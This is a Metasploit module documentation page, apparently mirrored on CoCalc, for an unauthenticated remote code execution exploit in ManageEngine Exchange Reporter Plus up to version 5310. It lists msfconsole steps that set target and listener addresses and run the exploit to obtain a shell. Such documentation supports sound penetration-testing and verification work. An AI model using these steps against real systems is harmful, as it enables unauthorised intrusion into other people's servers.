CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/windows/http/manageengine_adshacluster_rce.md
Views: 1904
Description
This module exploits a remote code execution vulnerability that exists in Exchange Reporter Plus <= 5310, caused by execution of bcp.exe file inside ADSHACluster servlet. Additional information can be viewed on https://security.szurek.pl/en/manage-engine-exchange-reporter-plus-unauthenticated-rce/
Verification Steps
Verification Steps
Install the application
Start msfconsole
Do:
use exploit/windows/http/manageengine_adshacluster_rce
Do:
set rhost <ip>
Do:
check
Do:
set lport <port>
Do:
set lhost <ip>
Do:
exploit
You should get a shell.